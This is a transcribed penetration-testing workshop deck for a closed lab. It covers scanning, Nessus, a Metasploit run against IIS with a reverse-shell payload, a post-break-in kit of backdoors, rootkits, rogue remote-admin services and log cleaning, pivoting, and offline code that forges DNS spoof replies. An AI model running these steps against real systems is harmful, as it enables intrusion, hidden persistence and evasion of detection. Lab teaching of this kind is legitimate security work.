pwnage workshop beta 8 14 2011
TRANSCRIPT
8/3/2019 Pwnage Workshop Beta 8 14 2011
1/81
Pwnage Workshop
From zero to hero. Level 1: Script Kiddie
Table of contents
Legal
Overview
Requirements
Entering the Lab
The scenario
5' intro to BackTrack
Let's get started
Legal
To be able to join this workshop you have to agree that you are completely responsible for what you do after you leave this room. We encourage you: don't use these tools and techniques to be evil.
Overview
This workshop is set in the early 2000s. Our aim is to teach you some hacking techniques, from basic networking to exploiting machines, through a hands-on workshop.
Enjoy!
Requirements
Human:
1. Basic Microsoft Windows knowledge
2. Basic Linux knowledge
3. Basic VMware knowledge
4. Basic networking knowledge
5. Patience
6. Respect
7. Then GOTO 5
Hardware: computer/laptop, 2+ GB RAM, Ethernet AND wireless access
Software: VMware, virtualized version of BackTrack
Entering the Lab
Identify your Ethernet LAN adapter.
Disable TCP/IPv4 and IPv6 on that adapter in the host OS, so that only the virtual machine, not your host, talks to the lab network.
Open the VMware Virtual Network Editor.
Identify or create a network and bridge it to your Ethernet LAN adapter.
Plug your Ethernet cable into the designated switch.
Entering the Lab
Go to your BackTrack virtual machine and right-click on the networking icon at the bottom right.
Select Custom, and select the name of the network bridged to the LAN.
Storyline
The scenario
What you know: there should be something behind the switch.
What you don't know: everything else.
5' intro to BackTrack
The /pentest/ directory
Most of the programs can be run from the shell
The desktop (run startx in a terminal): lets you see multiple terminals at the same time, and is also needed for running Maltego
5' intro to BackTrack
Finding tools
The $PATH:
root@bt:~# echo $PATH
The find command:
root@bt:~# find / -name nmap
root@bt:~# find /pentest/ -name '*.dic'
Terminate a running program: Control + C
And of course TAB for autocompleting and the arrow keys to reuse your previously typed commands.
Let's get started
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.
Challenge 1: Obtain IP address.
So you are in the middle of, I don't know, you just plugged in your cable and nothing happened. What can we do?
Logging in to BackTrack: for the user and password, read the welcome screen in BT.
Bringing up your Ethernet interface:
root@bt:~# ifconfig eth0 up
Assigning the right IP address to your PC.
Challenge 1: Obtain IP address.
First we listen. To be able to obtain a valid IP we can listen to the network and see if it gives us some hint about which is the right IP range.
Intro to network sniffers: what are sniffers? Promiscuous mode (the card hands every frame it sees to the sniffer, not only those addressed to its own MAC; on a switched LAN that still means mostly broadcasts such as ARP plus traffic for your own port, which is exactly why ARP is the first thing to filter on).
Sniffing with tcpdump.
Challenge 1: Obtain IP address.
Sniffing with tcpdump
List devices:
root@bt:~# tcpdump -D
1.eth0
2.usbmon1 (USB bus number 1)
3.any (Pseudo-device that captures on all interfaces)
4.lo
Select the right device and start listening:
root@bt:~# tcpdump -i eth0
tcpdump: WARNING: eth0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
See something? See too much? Try filters (-n: don't resolve names; options go before the filter expression):
root@bt:~# tcpdump -n -i eth0 arp
root@bt:~# tcpdump -n -i eth0 tcp
root@bt:~# tcpdump -n -i eth0 'tcp and dst port 23'
Challenge 1: Obtain IP address.
You found the right IP range!!!
Set up your IP address:
root@bt:~# ifconfig eth0 192.168.1.6/24
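As an added worked example (not part of the original workshop), the following Python script does the "first we listen" step offline: it parses lines in the format printed by `tcpdump -n -i eth0 arp`, infers the /24 the hosts live on, picks the likely gateway (the most-queried who-has target) and suggests an address nobody is using or asking for. The capture lines are constructed for illustration, and the /24 prefix is a lab assumption: ARP alone cannot tell you the netmask.

```python
import re
import ipaddress
from collections import Counter

# Constructed sample in the format of `tcpdump -n -i eth0 arp` (not a real capture).
SAMPLE_ARP = """\
15:58:01.101 ARP, Request who-has 192.168.1.1 tell 192.168.1.104, length 46
15:58:01.102 ARP, Reply 192.168.1.1 is-at 00:21:29:aa:a6:89, length 28
15:58:02.310 ARP, Request who-has 192.168.1.1 tell 192.168.1.11, length 46
15:58:03.550 ARP, Request who-has 192.168.1.11 tell 192.168.1.1, length 46
15:58:03.551 ARP, Reply 192.168.1.11 is-at 00:50:43:6a:20:2b, length 28
15:58:04.000 ARP, Request who-has 192.168.1.2 tell 192.168.1.104, length 46
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
REQ = re.compile(r"ARP, Request who-has " + IPV4 + r" tell " + IPV4)
REP = re.compile(r"ARP, Reply " + IPV4 + r" is-at ([0-9a-f:]{17})")


def parse_arp(text):
    """Return (set of IPs proven alive, Counter of who-has targets).
    A host is alive if it asked a question ('tell X') or answered one."""
    alive = set()
    targets = Counter()
    for line in text.splitlines():
        m = REQ.search(line)
        if m:
            targets[m.group(1)] += 1
            alive.add(m.group(2))
            continue
        m = REP.search(line)
        if m:
            alive.add(m.group(1))
    return alive, targets


def infer_network(alive, prefixlen=24):
    """Assume (lab assumption) a single /prefixlen containing every host seen."""
    nets = {ipaddress.ip_interface(f"{ip}/{prefixlen}").network for ip in alive}
    if len(nets) != 1:
        raise ValueError(f"hosts span several /{prefixlen} networks: {nets}")
    return nets.pop()


def likely_gateway(targets):
    """Everyone asks for the default gateway, so the most-queried target usually is it."""
    return targets.most_common(1)[0][0] if targets else None


def pick_free_ip(net, alive, targets):
    """First host address nobody used or asked for. Skipping who-has targets that never
    answered is conservative: they may be free, but colliding with a sleeping host hurts."""
    busy = set(alive) | set(targets)
    for host in net.hosts():
        if str(host) not in busy:
            return str(host)
    raise RuntimeError("no free address in range")


if __name__ == "__main__":
    alive, targets = parse_arp(SAMPLE_ARP)
    net = infer_network(alive)
    print("hosts seen :", sorted(alive, key=ipaddress.ip_address))
    print("gateway?   :", likely_gateway(targets))
    print("suggestion : ifconfig eth0", f"{pick_free_ip(net, alive, targets)}/{net.prefixlen}")
```

Run it against a real capture with `tcpdump -n -i eth0 -l arp | python3 listen.py` once you replace `SAMPLE_ARP` with `sys.stdin.read()`; a minute of listening on a busy segment is usually enough to see the gateway and a handful of hosts.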
Challenge 2: Detect/Define our victim.
The art of scanning:
What is scanning
Ping? Pong!
Dissection of a scan, one packet at a time.
Netcat, nmap, amap
Challenge 2: Detect/Define our victim.
What is scanning
Ping? Pong! Ping sweep: a method that establishes which IP addresses in a range map to live hosts.
Example:
root@bt:~# nmap -sn 192.168.69.0/24
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-14 15:58 EDT
Nmap scan report for 192.168.69.1
Host is up (0.0031s latency).
MAC Address: 00:21:29:AA:A6:89 (Cisco-Linksys)
Nmap scan report for 192.168.69.104
Host is up (0.0023s latency).
MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
Nmap scan report for 192.168.69.145
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.48 seconds
Challenge 2: Detect/Define our victim.
Dissection of a ping sweep, one packet at a time.
Wireshark: view of a ping sweep
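Added example, not from the deck: on a local Ethernet segment, `nmap -sn` run as root does not send ICMP echo at all; it sends one ARP who-has per address and reports a host as up when an is-at reply comes back (that is why the sweep above printed MAC addresses). This script builds the same 42-byte Ethernet/ARP frames and dissects them into the fields Wireshark shows, so you can line it up against the capture. MAC and IP addresses are made up; nothing is put on the wire.

```python
import struct
import ipaddress

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def _arp_frame(eth_dst, src_mac, oper, sha, spa, tha, tpa):
    """Ethernet II header (14 bytes) + ARP body (28 bytes). The NIC pads the frame to
    60 bytes on the wire, which is why tcpdump shows 'length 46' for the ARP part."""
    eth = mac_bytes(eth_dst) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, operation
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)
    arp += mac_bytes(sha) + ip_bytes(spa) + mac_bytes(tha) + ip_bytes(tpa)
    return eth + arp


def build_arp_request(src_mac, src_ip, target_ip):
    """'who-has target_ip tell src_ip', broadcast, target MAC left as zeros."""
    return _arp_frame(BROADCAST, src_mac, ARP_REQUEST, src_mac, src_ip, ZERO_MAC, target_ip)


def build_arp_reply(src_mac, src_ip, dst_mac, dst_ip):
    """'src_ip is-at src_mac', unicast back to whoever asked."""
    return _arp_frame(dst_mac, src_mac, ARP_REPLY, src_mac, src_ip, dst_mac, dst_ip)


def dissect_arp(frame):
    """Split a raw Ethernet/ARP frame into the fields Wireshark lists."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    dst, src = frame[0:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETH_P_ARP:
        raise ValueError(f"not ARP: ethertype 0x{ethertype:04x}")
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    return {
        "eth_dst": mac_str(dst), "eth_src": mac_str(src),
        "op": {ARP_REQUEST: "who-has", ARP_REPLY: "is-at"}.get(oper, str(oper)),
        "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42]),
    }


def sweep_frames(src_mac, src_ip, net_cidr):
    """Every who-has an ARP sweep of net_cidr sends: one frame per host address."""
    return [build_arp_request(src_mac, src_ip, str(h))
            for h in ipaddress.ip_network(net_cidr).hosts()]


if __name__ == "__main__":
    frames = sweep_frames("00:0c:29:aa:bb:cc", "192.168.69.145", "192.168.69.0/24")
    print(len(frames), "requests; first one:", dissect_arp(frames[0]))
    reply = build_arp_reply("00:50:43:6a:20:2b", "192.168.69.104",
                            "00:0c:29:aa:bb:cc", "192.168.69.145")
    print("reply:", dissect_arp(reply))
```

In the Wireshark capture of the sweep you should see 254 broadcast who-has frames from the scanner's MAC in a tight burst and only as many is-at replies as there are live hosts; the "Host is up" lines in the nmap output map one-to-one onto those replies.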
Challenge 2: Detect/Define our victim.
Now it's your time: find your victim.
Challenge 3: Service recognition.
Ports & port scanning.
Services: what are services, detecting services.
Banner recognition
Challenge 3: Service recognition.
Ports
Port: a port is a numbered communications endpoint that identifies an application on a host. It is used by the transport protocols of the Internet Protocol Suite, such as the Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP).
The port numbers are divided into three ranges: the Well Known Ports, the Registered Ports, and the Dynamic and/or Private Ports.
The Well Known Ports are those from 0 through 1023 (ftp, telnet, tftp).
The Registered Ports are those from 1024 through 49151 (socks, ms-sql, mysql).
The Dynamic and/or Private Ports are those from 49152 through 65535.
TCP & UDP: each protocol has its own set of 65536 ports, so a TCP scan says nothing about UDP services such as dns, snmp or tftp.
http://www.iana.org/assignments/port-numbers
Challenge 3: Service recognition.
Port scanning
root@bt:~# nmap -n -p1-65535 192.168.69.104
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-17 15:07 EDT
Nmap scan report for 192.168.69.104
Host is up (0.041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
Nmap done: 1 IP address (1 host up) scanned in 37.48 seconds
Challenge 3: Service recognition.
Wireshark port scan capture: the 3-way handshake
Challenge 3: Service recognition.
Services
Some services: ssh, dhcp, dns, authentication, proxy, email, web, snmp, ftp, tftp
Challenge 3: Service recognition.
Banner recognition
root@bt:~# nmap -n -p22 -sV 192.168.69.104
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-17 15:40 EDT
Nmap scan report for 192.168.69.104
Host is up (0.0020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 8 (protocol 2.0)
MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
Service Info: OS: Linux
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
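Added example (not the workshop's code) showing what a connect scan and a banner grab do on the wire: a constructed stand-in service on 127.0.0.1 answers with an OpenSSH-style banner, the scanner completes the 3-way handshake on each port, reads whatever the server volunteers (exactly what `nc host 22` prints), and a crude matcher mimics the banner lookup behind `nmap -sV`. The banner text is constructed; `closed_port()` is a demo helper that finds a port nothing listens on so the "closed" path is exercised too.

```python
import socket
import threading


def fake_service(banner, host="127.0.0.1"):
    """Constructed stand-in for a banner-first service such as sshd, on an ephemeral
    port. Returns the listening socket; its port is srv.getsockname()[1]."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:            # listener closed, stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv


def closed_port(host="127.0.0.1"):
    """Pick a port with no listener (demo helper for the 'closed' case)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def grab_banner(host, port, timeout=1.0):
    """TCP connect scan of one port plus a passive banner read."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))    # full 3-way handshake: SYN, SYN/ACK, ACK
        except ConnectionRefusedError:
            return "closed", b""       # a RST came back
        except OSError:
            return "filtered", b""     # nothing came back (dropped by a firewall)
        try:
            return "open", s.recv(256)
        except socket.timeout:
            return "open", b""         # open, but the server waits for us to speak (http)


def connect_scan(host, ports):
    """Scan a list of ports; returns {port: (state, banner)}."""
    return {p: grab_banner(host, p) for p in ports}


def identify(banner):
    """Very crude version of nmap -sV's banner matching."""
    text = banner.decode("ascii", "replace").strip()
    if text.startswith("SSH-"):
        _, proto, software = text.split("-", 2)
        return f"ssh ({software}, protocol {proto})"
    if text.startswith("220 "):
        return f"ftp ({text[4:]})"
    if not text:
        return "silent: client speaks first, try a request by hand"
    return f"unknown: {text[:40]}"


if __name__ == "__main__":
    srv = fake_service(b"SSH-2.0-OpenSSH_5.1p1 Debian-8\r\n")   # constructed banner
    open_port = srv.getsockname()[1]
    for port, (state, banner) in connect_scan("127.0.0.1", [open_port, closed_port()]).items():
        print(f"{port}/tcp {state} {identify(banner) if state == 'open' else ''}")
    srv.close()
```

The classification mirrors what nmap reports: a RST means closed, silence means filtered, and a completed handshake means open whether or not a banner follows. Services that wait for the client (http, most RPC) show up as open-but-silent, which is why `nmap -sV` sends probes instead of only listening.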
Challenge 3: Service recognition.
Wireshark service detection capture
Challenge 3: Service recognition.
Closing chapter 3
After you have the results, let's build a general picture from them:
How many machines?
Which OSs?
Which ports?
Which services? Which software (and which versions)?
Are they server or desktop machines?
Challenge 3: Service recognition.
2 Free TIPs
Browsing the services: browse two common services with their corresponding client (a web browser for port 80, an ssh client for port 22).
Use netcat to connect to the services and read the banner by hand.
Why don't we try to recognize the OS running on each machine? Try:
root@bt:~# nmap -O host
Challenge 4: Vulnerability detection.
What are vulnerabilities: IETF RFC 2828 defines vulnerability as:
"A flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy."
Playing with Nessus: what is Nessus, installing Nessus on BackTrack, creating policies, understanding the results.
Challenge 4: Vulnerability detection.
Playing with Nessus
What is Nessus: Nessus is a vulnerability scanner (bla bla bla).
Installing Nessus on BackTrack: we are going to connect our BackTrack machine to the public internet in order to retrieve Nessus from its home site.
1. Unbridge from the lab and bridge to your wireless adapter
2. dhclient
3. Register at nessus.org (as a home user)
4. Obtain your activation code (check your inbox)
5. Paste the registration command into a shell
6. Create a user
7. Rebridge to your Ethernet adapter
8. Set your first IP again
9. Start Nessus
10. Browse to https://yourip:8834
Challenge 4: Vulnerability detection.
Playing with Nessus: creating policies
The Nessus interface is fairly intuitive. Take 5 minutes to create your own policy, keeping in mind the results from the previous stages (the OSs, ports and services you actually found).
Now that you have done it, please don't forget to also include the following plugin families:
CGI abuses
RPC
Web Servers
Windows
Challenge 4: Vulnerability detection.
Playing with Nessus: understanding the results
If results != 0 then go read them; again, take your time.
From the results, which machines are vulnerable?
Challenge 5: Exploiting vulnerability.
Creating your hack-kit
Using exploits: simple exploits, the Metasploit framework.
Challenge 5: Exploiting vulnerability.
Creating your hack-kit
A hack-kit is your own set of tools for backdooring/administrating/protecting your new server; you upload it after you break into a server. In general you would like to upload:
Process/service tools: list/kill processes.
File transfer tools: normally an FTP server.
Administration tools: access to the remote desktop.
Covering tracks: log laundry.
Hiding your stuff: rootkits.
Maintaining access: backdoors.
Expansion tools: scanners and more exploits.
Hardening: patches and service packs (so nobody else gets in the same way you did).
Challenge 5: Exploiting vulnerability.
Proposed tools
Listing/killing processes and port scanning: these tools let you take a look from the command line at what is running on the remote server, as well as start remote reconnaissance.
Fport.exe (Fport 2.0)
KILL.EXE
TLIST.EXE
dfind.exe
Client/administration tools: let you administer your rogue services remotely.
Remote Administrator 2.1
Serv-U Administrator 3
Rogue FTP server: a simple and powerful FTP server.
WINMGNT.EXE
ServUDaemon.ini
Rogue remote administration tool: if you want remote desktop, here is a solution; telnet and file transfer capabilities are included as well.
AdmDll.dll
r_server.exe
raddrv.dll
settings.reg
Challenge 5: Exploiting vulnerability.
How to use the tools.
Installing rogue services: the important capability of these rogue services is that they can be installed as Windows services, from the command line. So once you are in the remote shell, transfer your hack-kit (pack.exe) and run the following commands.
Challenge 5: Exploiting vulnerability.
What are exploits.
Why they are fun.
Where you can find them.
How to use them: compiling, testing, executing.
Challenge 5: Exploiting vulnerability.
What are exploits.
An exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behaviour in computer software, hardware, or something electronic. This frequently includes such things as gaining control of a computer system, allowing privilege escalation, or a denial of service attack.
Types
Exploits are commonly categorized and named by these criteria:
The type of vulnerability they exploit.
Whether they need to be run on the same machine as the vulnerable program (local) or can be run on one machine to attack a program running on another machine (remote).
The result of running the exploit (remote access, privilege escalation, DoS, data leak, etc.).
Challenge 5: Exploiting vulnerability.
What are exploits.
Why they are fun: because they could give us unauthorized access to something (data, a remote machine) and/or let us become administrator.
Challenge 5: Exploiting vulnerability.
What an exploit looks like.
Challenge 5: Exploiting vulnerability.
Meanwhile, in a very, very, very secure server...
Challenge 5: Exploiting vulnerability.
Back to our very, very, very secure server.
Well, thanks for the info. You bad service, you spat out a file and then went to sleep?
C'MON
Challenge 5: Exploiting vulnerability.
What are exploits.
Why they are fun.
Where you can find them.
Challenge 5: Exploiting vulnerability.
Where you can find them.
There are multiple sites; one of them is exploit-db.com, with a huge list of exploits for multiple software packages.
Challenge 5: Exploiting vulnerability.
Some other things about exploits:
Public exploits vs. private exploits.
Open source vs. closed/compiled ones.
Protected, fake, booby-trapped and rootkitted ones: read and understand the source before you compile it, and test it in a throwaway VM, not on your own machine.
And we also have Metasploit.
Challenge 5: Exploiting vulnerability.
What are exploits.
Why they are fun.
Where you can find them.
How to use them: compiling, testing, executing.
Challenge 5: Exploiting vulnerability.
Using Metasploit
Setting up Metasploit to attack a machine: select the exploit, the victim, and what you want to do on that machine. Profit.
First, you have to know the module name (it's in the Nessus output).
Run Metasploit:
root@bt:~# /pentest/exploits/framework3/msfconsole
Search for the exploit:
msf > show exploits
Start using the exploit:
msf > info windows/iis/ms01_026_dbldecode
msf > use windows/iis/ms01_026_dbldecode
Ask for the config:
msf exploit(ms01_026_dbldecode) > show options
Minimum requirements:
msf exploit(ms01_026_dbldecode) > set RHOST 192.168.1.11
Set the payload:
msf exploit(ms01_026_dbldecode) > set PAYLOAD generic/shell_reverse_tcp
Ask for the config again (the payload added its own options) and tell the shell where to call back:
msf exploit(ms01_026_dbldecode) > show options
msf exploit(ms01_026_dbldecode) > set LHOST YOURIP
msf exploit(ms01_026_dbldecode) > exploit
NOW WHAAAAAAAAAAAAAAAAAAAATTTTTTT
Challenge 6: Gain remote access.
You hacked it, right? Now what?
Installing channels (or something like that): Remote Administrator, Serv-U, netcat.
Challenge 7: Remote network recognition.
We have to go deeper.
Scanning the LAN: here we are going to use a tool from our hack-kit, dfind, run from the machine we just took over, which sits on the internal network.
Challenge 8: Exploiting Remote machines.
So you detected some machines, you detected some services; now it's time to exploit them.
What tools can we use to exploit remote vulnerabilities?
Challenge 8: Exploiting Remote machines.
Exploiting remote Windows machines
Analyze the dfind results.
Search for available vulnerability information.
Prepare the exploit.
Profit.
Challenge 8: Exploiting Remote machines.
Exploiting remote Linux machines
Analyze the dfind results.
Search for available vulnerability information.
Prepare the exploit.
Profit.
Challenge 8: Exploiting Remote machines.
Once you have one:
Man-in-the-middle attacks (ettercap)
DNS poisoning
Exploiting browsers
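Added example, not from the deck, on why ettercap's DNS spoofing works once you are in the middle: a stub resolver accepts the first UDP response whose transaction ID and question match its query, and nothing in plain DNS authenticates who sent it. The script builds a victim's A query, the forged reply an on-path attacker would inject (same ID, same question, attacker-chosen address), parses it the way the resolver does, and shows the only check standing in the way. Names and addresses are constructed; nothing is sent on the network. Off-path, the attacker would also have to guess the 16-bit ID and the source port, which is what makes the on-path (ARP-poisoned) position so much easier.

```python
import struct


def encode_name(name):
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(msg, off):
    """Read a name at msg[off], following one level of compression pointers.
    Returns (name, offset just past the name)."""
    labels = []
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                       # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        off += 1
        if ln == 0:
            return ".".join(labels), off
        labels.append(msg[off:off + ln].decode())
        off += ln


def build_query(name, txid):
    """Plain A query as a stub resolver (the victim's browser) sends it: RD=1."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN


def parse_header(msg):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": txid, "qr": flags >> 15, "qdcount": qd, "ancount": an}


def forge_response(query, spoofed_ip, ttl=3600):
    """What an on-path attacker answers: copy the victim's txid and question,
    set QR=1, and attach one A record pointing at the address of our choice."""
    txid = struct.unpack("!H", query[:2])[0]
    _, off = decode_name(query, 12)
    question = query[12:off + 4]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)      # QR RD RA, 1 answer
    rdata = bytes(int(x) for x in spoofed_ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(msg):
    """Return (txid, question name, [(name, ipv4, ttl), ...]) for A answers."""
    h = parse_header(msg)
    qname, off = decode_name(msg, 12)
    off += 4                                           # skip QTYPE/QCLASS
    answers = []
    for _ in range(h["ancount"]):
        aname, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((aname, ".".join(str(b) for b in rdata), ttl))
    return h["id"], qname, answers


def resolver_accepts(query, response):
    """The checks a naive resolver makes before caching: it is a response, the txid
    matches, the question matches. Nothing about who sent it."""
    qid = struct.unpack("!H", query[:2])[0]
    qname, _ = decode_name(query, 12)
    rid, rname, _ = parse_response(response)
    return parse_header(response)["qr"] == 1 and rid == qid and rname.lower() == qname.lower()


if __name__ == "__main__":
    q = build_query("www.example.com", 0x1234)           # constructed victim query
    r = forge_response(q, "192.168.1.6")                  # attacker's host in the lab
    print("forged answer:", parse_response(r))
    print("victim would cache it:", resolver_accepts(q, r))
```

The same parser run against the victim's real traffic is also the detector: two responses for one transaction ID with different A records means somebody is racing the legitimate server.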
Super Secret Network Topology
Machines and their vulnerabilities
Windows NT 4: from Nessus to Metasploit (IIS).
Red Hat 6.2: 7350wu.c, Wu-ftpd v2.6.0 remote root exploit.
Windows 2000: from BackTrack, Nessus results fed into Metasploit autopwn. KABOOM!!!
Challenge List
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.